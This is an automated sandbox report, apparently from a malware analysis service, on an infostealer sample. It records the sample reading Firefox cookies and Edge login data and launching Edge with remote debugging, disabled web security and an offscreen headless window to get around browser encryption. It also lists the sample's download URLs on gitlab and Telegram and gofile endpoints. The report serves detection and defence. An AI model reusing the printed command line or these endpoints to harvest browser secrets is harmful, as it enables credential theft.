      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeMemory allocated: 21079D50000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE22BE70 GetSystemInfo,0_2_00007FFEEE22BE70
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E11D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: KD:\sources\replacementmanifests\microsoft-hyper-v-migration-replacement.man
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E11D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: RD:\sources\replacementmanifests\microsoft-hyper-v-client-migration-replacement.man
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E11D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 2microsoft-hyper-v-client-migration-replacement.man
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E11D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SD:\sources\replacementmanifests\microsoft-hyper-v-drivers-migration-replacement.man
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E11D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 3microsoft-hyper-v-drivers-migration-replacement.man
      Source: hJ1bl8p7dJ.exe, 00000000.00000003.1899545762.0000021079E78000.00000004.00000020.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900144618.0000021079E78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E11D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: +microsoft-hyper-v-migration-replacement.man
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1901449352.0000025112101000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SA0#P
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE259AC0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FFEEE259AC0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE259AC0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FFEEE259AC0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE24B728 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FFEEE24B728
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9723 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Documents\Your_Benefits_and_Role.docx" /o ""Jump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9230 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior

      Language, Device and Operating System Detection

      barindex
      Yara detected Telegram Recon
      Source: Yara matchFile source: hJ1bl8p7dJ.exe, type: SAMPLE
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE24BFF0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FFEEE24BFF0

      Stealing of Sensitive Information

      barindex
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqliteJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite-shmJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite-walJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGGJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGGJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeDirectory queried: C:\Users\user\Documents\NHPKIZUUSGJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeDirectory queried: C:\Users\user\Documents\PSAMNLJHZWJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeDirectory queried: C:\Users\Public\Documents\638724355399194976\FilesJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeDirectory queried: C:\Users\Public\Documents\638724355399194976\Files\DJump to behavior
      Source: Yara matchFile source: Process Memory Space: hJ1bl8p7dJ.exe PID: 7760, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Attempt to bypass Chrome Application-Bound Encryption
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9723 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
      DLL Side-Loading      		11
      Process Injection      		1
      Masquerading      		1
      OS Credential Dumping      		1
      System Time Discovery      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      DLL Side-Loading      		1
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Query Registry      		Remote Desktop Protocol11
      Data from Local System      		1
      Remote Access Software      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
      Process Injection      		Security Account Manager11
      Security Software Discovery      		SMB/Windows Admin SharesData from Network Shared Drive1
      Ingress Tool Transfer      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information      		NTDS1
      Virtualization/Sandbox Evasion      		Distributed Component Object ModelInput Capture2
      Non-Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
      Obfuscated Files or Information      		LSA Secrets1
      Process Discovery      		SSHKeylogging3
      Application Layer Protocol      		Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain Credentials1
      System Network Configuration Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync11
      File and Directory Discovery      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem4
      System Information Discovery      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1590664 Sample: hJ1bl8p7dJ.exe Startdate: 14/01/2025 Architecture: WINDOWS Score: 72 27 ip-api.com 2->27 29 gitlab.com 2->29 31 2 other IPs or domains 2->31 39 Yara detected Telegram Recon 2->39 41 Drops password protected ZIP file 2->41 43 AI detected suspicious sample 2->43 45 Sigma detected: Potential Data Stealing Via Chromium Headless Debugging 2->45 8 hJ1bl8p7dJ.exe 4 18 2->8         started        signatures3 process4 dnsIp5 33 ip-api.com 208.95.112.1, 50007, 50010, 80 TUT-ASUS United States 8->33 35 api.ipify.org 104.26.12.205, 443, 50005, 50006 CLOUDFLARENETUS United States 8->35 37 2 other IPs or domains 8->37 25 C:\Users\user\Desktop\e_sqlite3.dll, PE32+ 8->25 dropped 47 Attempt to bypass Chrome Application-Bound Encryption 8->47 49 Tries to harvest and steal browser information (history, passwords, etc) 8->49 13 msedge.exe 5 8->13         started        15 msedge.exe 4 8->15         started        17 WINWORD.EXE 127 106 8->17         started        19 conhost.exe 8->19         started        file6 signatures7 process8 process9 21 msedge.exe 13->21         started        23 msedge.exe 15->23         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      hJ1bl8p7dJ.exe3%ReversingLabs
      hJ1bl8p7dJ.exe1%VirustotalBrowse

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\Desktop\e_sqlite3.dll0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://schemas.openxmlformats.o0%Avira URL Cloudsafe
      https://api.ipify.orgY0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      bg.microsoft.map.fastly.net
      		199.232.214.172
      		truefalse
        		high
        gitlab.com
        		172.65.251.78
        		truefalse
          		high
          s-part-0017.t-0009.t-msedge.net
          		13.107.246.45
          		truefalse
            		high
            api.ipify.org
            		104.26.12.205
            		truefalse
              		high
              ip-api.com
              		208.95.112.1
              		truefalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://gitlab.com/app8490744/updatesa/-/raw/main/Your_Benefits_and_Role.docx?inline=falsefalse
                  		high
                  https://api.ipify.org/false
                    		high
                    https://gitlab.com/hko247.black/libs/-/raw/da36e8916e710628358afbbd35fc9d73b2fd41c2/e_sqlite3.dll?inline=falsefalse
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://github.com/mono/linker/issues/1731hJ1bl8p7dJ.exefalse
                        		high
                        https://github.com/mono/linker/issues/2025hJ1bl8p7dJ.exefalse
                          		high
                          https://github.com/mono/linker/pull/2125.hJ1bl8p7dJ.exefalse
                            		high
                            http://schemas.mhJ1bl8p7dJ.exe, 00000000.00000003.1584069385.0000025112145000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://github.com/mono/linker/issues/1895vUsinghJ1bl8p7dJ.exefalse
                                		high
                                https://api.telegram.org/bothJ1bl8p7dJ.exe, 00000000.00000002.1902568203.00007FF7D2A51000.00000004.00000001.01000000.00000003.sdmpfalse
                                  		high
                                  https://gitlab.com/-/sandbox/;hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E09A000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpfalse
                                    		high
                                    https://gitlab.com/hko247.black/libs/-/raw/da36e8916e710628358afbbd35fc9d73b2fd41c2/e_sqlite3.dll?inhJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E09A000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902568203.00007FF7D2A51000.00000004.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmp, ConDrv.0.drfalse
                                      		high
                                      https://snowplow.trx.gitlab.nethJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E09A000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpfalse
                                        		high
                                        https://system.data.sqlite.org/XhJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpfalse
                                          		high
                                          https://www.newtonsoft.com/jsonhJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmpfalse
                                            		high
                                            https://collector.prd-278964.gl-product-analytics.comhJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E09A000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpfalse
                                              		high
                                              http://ip-api.com/json/yhJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmpfalse
                                                		high
                                                http://schemas.microhJ1bl8p7dJ.exe, 00000000.00000002.1901449352.0000025112101000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://gitlab.comhJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E09A000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://github.com/dotnet/runtimehJ1bl8p7dJ.exefalse
                                                      		high
                                                      https://api.ipify.orghJ1bl8p7dJ.exe, 00000000.00000002.1902568203.00007FF7D2A51000.00000004.00000001.01000000.00000003.sdmpfalse
                                                        		high
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidYhJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmpfalse
                                                          		high
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidhJ1bl8p7dJ.exe, 00000000.00000002.1902568203.00007FF7D2A51000.00000004.00000001.01000000.00000003.sdmpfalse
                                                            		high
                                                            https://aka.ms/dotnet-warnings/hJ1bl8p7dJ.exefalse
                                                              		high
                                                              https://github.com/dotnet/efcorehJ1bl8p7dJ.exefalse
                                                                		high
                                                                https://gitlab.com/assets/hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://ip-api.com/json/hJ1bl8p7dJ.exe, 00000000.00000002.1902568203.00007FF7D2A51000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                    		high
                                                                    https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_envhJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E09A000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://schemas.xmlsoap.org/wsdl/ihJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                        		high
                                                                        https://aka.ms/nativeaot-compatibilityhJ1bl8p7dJ.exe, 00000000.00000002.1902568203.00007FF7D2A51000.00000004.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                          		high
                                                                          http://ip-api.com/json/8.46.123.189hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E11D000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E1C2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://schemas.openxmlformats.ohJ1bl8p7dJ.exe, 00000000.00000002.1901449352.0000025112101000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://aka.ms/serializationformat-binary-obsoletehJ1bl8p7dJ.exefalse
                                                                              		high
                                                                              https://aka.ms/binaryformatterhJ1bl8p7dJ.exefalse
                                                                                		high
                                                                                https://apis.google.comhJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E09A000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://api.telegram.org/botihJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namehJ1bl8p7dJ.exe, 00000000.00000002.1902568203.00007FF7D2A51000.00000004.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                      		high
                                                                                      https://sentry.gitlab.nethJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E09A000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://gitlab.com:443/phJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E09A000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E02B000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://github.com/ericsink/SQLitePCL.rawdhJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                            		high
                                                                                            http://schemas.xmlsoap.org/soap/encoding/YhJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                              		high
                                                                                              https://github.com/JamesNK/Newtonsoft.JsonhJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                		high
                                                                                                https://www.recaptcha.net/hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://schemas.xmlsoap.org/soap/encoding/hJ1bl8p7dJ.exe, 00000000.00000002.1902568203.00007FF7D2A51000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                    		high
                                                                                                    http://ip-api.com:80/phJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E11D000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E1C2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name(DefaultRoleClaimTypexhttp://schemas.microhJ1bl8p7dJ.exefalse
                                                                                                        		high
                                                                                                        https://api.gofile.io/servershJ1bl8p7dJ.exe, 00000000.00000002.1902568203.00007FF7D2A51000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                          		high
                                                                                                          https://api.gofile.io/serversYhJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                            		high
                                                                                                            https://github.com/icsharpcode/SharpZipLibhJ1bl8p7dJ.exefalse
                                                                                                              		high
                                                                                                              https://github.com/mono/linker/issues/1416.hJ1bl8p7dJ.exefalse
                                                                                                                		high
                                                                                                                https://aka.ms/nativeaot-compatibilityyhJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://new-sentry.gitlab.nethJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E09A000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://github.com/ericsink/SQLitePCL.rawXhJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://aka.ms/dotnet-illink/comhJ1bl8p7dJ.exefalse
                                                                                                                        		high
                                                                                                                        http://api.ipify.org:443/phJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E11D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://james.newtonking.com/projects/jsonhJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://github.com/mono/linker/issues/1981hJ1bl8p7dJ.exefalse
                                                                                                                              		high
                                                                                                                              https://urn.to/r/sds_see23https://urn.to/r/sds_see1UInnerVerifyhJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://gitlab.com/-/sandbox/hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E09A000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://gitlab.com/admin/hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://customers.gitlab.comhJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E09A000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://github.com/mono/linker/issues/1906.hJ1bl8p7dJ.exefalse
                                                                                                                                        		high
